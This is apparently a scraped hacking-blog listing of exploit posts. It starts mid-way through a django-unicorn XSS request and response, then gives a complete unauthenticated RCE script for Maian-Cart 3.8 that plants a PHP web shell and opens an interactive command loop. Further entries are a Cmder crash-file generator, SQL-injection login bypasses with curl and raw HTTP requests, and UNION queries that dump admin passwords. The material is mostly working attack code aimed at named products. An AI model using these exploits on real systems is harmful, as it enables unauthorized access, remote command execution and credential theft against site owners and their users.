empty Referer: https://www.django-unicorn.com/examples/todo Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 {""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""<img src=x onerror=alert(origin)>""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871} ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 200 OK Date: Thu, 07 Oct 2021 03:51:18 GMT Content-Type: application/json X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Via: 1.1 vegur Cf-Cache-Status: DYNAMIC Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"" Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800} Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800} Server: cloudflare Cf-Ray: 69a42b973f6a6396-ORD Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400 {""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""<img src=x onerror=alert(origin)>""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""<div unicorn:id=\""Q43GSmJh\"" unicorn:name=\""todo\"" unicorn:key=\""\"" unicorn:checksum=\""ZQn54Ct4\"">\n<form unicorn:submit.prevent=\""add\"">\n<input type=\""text\"" unicorn:model.lazy=\""task\"" placeholder=\""New task\"" id=\""task\""/>\n</form>\n<button unicorn:click=\""add\"">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\""$reset\"">Clear all tasks</button>\n</p>\n</div>\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}" "ENDTEXT"
  21. HireHackking

    Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) # Date: 27.11.2020 19:35 # Tested on: Ubuntu 20.04 LTS # Exploit Author(s): DreyAnd, purpl3 # Software Link: https://www.maiancart.com/download.html # Vendor homepage: https://www.maianscriptworld.co.uk/ # Version: Maian Cart 3.8 # CVE: CVE-2021-32172 #!/usr/bin/python3 import argparse import requests from bs4 import BeautifulSoup import sys import json import time parser = argparse.ArgumentParser() parser.add_argument("host", help="Host to exploit (with http/https prefix)") parser.add_argument("dir", help="default=/ , starting directory of the maian-cart instance, sometimes is placed at /cart or /maiancart") args = parser.parse_args() #args host = sys.argv[1] directory = sys.argv[2] #CREATE THE FILE print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True) time.sleep(1) try: r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw") print(r.text) if "added" in r.text: print("\033[95mFile successfully created.\n\033[00m") else: print("\033[91mSome error occured.\033[00m") except (requests.exceptions.RequestException): print("\033[91mThere was a connection issue. Check if you're connected to wifi or if the host is correct\033[00m") #GET THE FILE ID time.sleep(1) file_response = r.text soup = BeautifulSoup(file_response,'html.parser') site_json=json.loads(soup.text) hash_id = [h.get('hash') for h in site_json['added']] file_id = str(hash_id).replace("['", "").replace("']", "") print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m") print("\n") #WRITE TO THE FILE print("\033[95mWritting the payload to the file...\033[00m") print("\n") time.sleep(1) headers = { "Accept": "application/json, text/javascript, /; q=0.01", "Accept-Language" : "en-US,en;q=0.5", "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With" : "XMLHttpRequest", "Connection" : "keep-alive", "Pragma" : "no-cache", "Cache-Control" : "no-cache", } data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E" try: write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder", headers=headers, data=data) print(write.text) except (requests.exceptions.RequestException): print("\033[91mThere was a connection issue. Check if you're connected to wifi or if the host is correct\033[00m") #EXECUTE THE PAYLOAD print("\033[95mExecuting the payload...\033[00m") print("\n") time.sleep(1) exec_host = f"{host}{directory}/product-downloads/shell.php" print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m") time.sleep(2) while True: def main(): execute = str(input("$ ")) e = requests.get(f"{exec_host}?cmd={execute}") print(e.text) try: if __name__ == "__main__": main() except: exit = str(input("Do you really wish to exit? Y/N? ")) if exit == "Y" or exit =="y": print("\033[91mExit detected. Removing the shell...\033[00m") remove = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}") print("\033[91m" , remove.text, "\033[00m") print("\033[91mBye!\033[00m") sys.exit(1) else: main()
  22. HireHackking

    Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) # Date: 2021-10-07 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://cmder.net # Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip # Version: v1.3.18 # Tested on: Windows 10 # [About - Cmder Console Emulator] : #Cmder is a software package created over absence of usable console emulator on Windows. #It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout. # [Security Issue] : #equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition. #E.g λ cmder.cmd # [POC] : PAYLOAD=chr(235) + "\\CMDER" PAYLOAD = PAYLOAD * 3000 with open("cmder.cmd", "w") as f: f.write(PAYLOAD)
  23. HireHackking

    Online Enrollment Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html # Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html # Version: 1.0 # Tested on: Windows 10, Kali Linux # Admin panel authentication bypass Admin panel authentication can be bypassed due to a SQL injection in the login form: Request: POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 63 Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin= PoC: curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php
  24. HireHackking

    Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection # Date: 07.10.2021 # Exploit Author: Amine ismail @aminei_ # Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Multiple SQL injections The following PoCs will leak the admin username and password: Unauthenticated: http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list; Admin: http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
  25. HireHackking

    Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass # Date: 08.10.2021 # Exploit Author: Merve Oral # Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14981&title=Online+Employees+Work+From+Home+Attendance+System+in+PHP+and+SQLite+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Online Employees Work From Home Attendance System/Logs in a Web App v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/audit_trail/login.php 2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /wfh_attendance/Actions.php?a=login HTTP/1.1 Host: merve User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 40 Origin: http://merve Connection: close Referer: http://merve/wfh_attendance/admin/login.php Cookie: PHPSESSID=55nnlgv0kg2qaki92o2s9vl5rq username=admin'+or+'1'%3D'1&password=any